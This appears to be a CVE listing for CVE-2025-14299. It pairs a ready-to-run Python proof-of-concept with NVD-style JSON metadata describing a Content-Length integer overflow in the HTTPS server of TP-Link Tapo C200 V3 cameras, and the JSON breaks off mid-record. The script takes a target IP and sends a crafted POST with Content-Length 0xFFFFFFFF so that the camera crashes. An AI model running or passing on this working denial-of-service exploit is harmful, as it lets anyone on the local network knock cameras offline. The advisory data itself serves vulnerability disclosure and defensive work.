CVE-2025-14299

#!/usr/bin/env python3 # CVE-2025-14299 PoC - Tapo C200 V3 Content-Length Integer Overflow DoS # Target: TP-Link Tapo C200 V3 HTTPS Server # Note: Use only for authorized security testing import socket import ssl import sys def create_ssl_context(): """Create SSL context for HTTPS connection""" context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE return context def send_malicious_request(target_ip, target_port=443): """ Send crafted HTTPS request with oversized Content-Length to trigger integer overflow and cause DoS """ # Malicious Content-Length value that can trigger integer overflow # Using a value close to max integer to cause overflow in memory allocation malicious_content_length = 0xFFFFFFFF # Craft HTTP POST request with malicious Content-Length http_request = f"POST / HTTP/1.1\r\n" http_request += f"Host: {target_ip}\r\n" http_request += f"Content-Type: application/x-www-form-urlencoded\r\n" http_request += f"Content-Length: {malicious_content_length}\r\n" http_request += "Connection: close\r\n" http_request += "\r\n" try: context = create_ssl_context() with socket.create_connection((target_ip, target_port), timeout=10) as sock: with context.wrap_socket(sock, server_hostname=target_ip) as ssock: print(f"[*] Sending malicious request to {target_ip}:{target_port}") print(f"[*] Content-Length: {malicious_content_length}") ssock.send(http_request.encode()) print("[+] Request sent successfully") print("[*] Target should crash or become unresponsive") except Exception as e: print(f"[-] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 print("=" * 60) print("CVE-2025-14299 PoC - Tapo C200 V3 DoS") print("=" * 60) send_malicious_request(target, port)

{"cve": {"id": "CVE-2025-14299", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2025-12-20T01:16:02.670", "lastModified": "2026-01-08T19:38:06.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTTPS server on Tapo C200 V3 does not properly validate the Content-Length header, which can lead to an integer overflow. An unauthenticated attacker on the same local network segment can send crafted HTTPS requests to trigger excessive memory allocation, causing the device to crash and resulting in denial-of-service (DoS)."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.3:build_230228:*:*:*:*:*:*", "matchCriteriaId": "CABD8DE6-9904-499D-919F-9DBD42BE6762"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.4:build_230424:*:*:*:*:*:*", "matchCriteriaId": "254031B5-7CC7-4B9D-970B-FAA6EBC3EAFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.5:build_230717:*:*:*:*:*:*", "matchCriteriaId": "9D61B481-8262-44D4-9A1D-9967AB1805DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.7:build_230920:*:*:*:*:*:*", "matchCriteriaId": "50D2F368-F8C8-41E1-9360-8CDF9F89E566"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.9:build_231019:*:*:*:*:*:*", "matchCriteriaId": "EF80958C-4274-4DEA-9730-176E3E6F21F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.11:build_231115:*:*:*:*:*:*", "matchCriteriaId": "7AA1B7FA-D418-46B2-A530-BF67E550E38F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.13:build_240327:*:*:*:*:*:*", "matchCriteriaId": "DC4382B5-C7EC-4B98-AF28-8D08D0771133"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.14:build_240513:*:*:*:*:*:*", "matchCriteriaId": "1FCE1F5E-E84B-4CF4-B8A4-7A3448A0D127"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.15:build_240715:*:*:*:*:*:*", "matchCriteriaId": "C05AC5C2-5BB7-499A-AE2B-414103317D47"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.1:build_241212:*:*:*:*:*:*", "matchCriteriaId": "C1ED28D6-9441-440A-81D8-EB539D50BB56"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.2:build_250313:*:*:*:*:*:*", "matchCriteriaId": "51E28752-8B46-48CD-86B5-437449AED7C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.4:build_250922:*:*:*:*:*:*", "matchCriteriaId": "ECBC265E-2AA6-471E-A7BE-8F35DDA28645"}]}, {"operator": "OR", "negate": fals ... (truncated)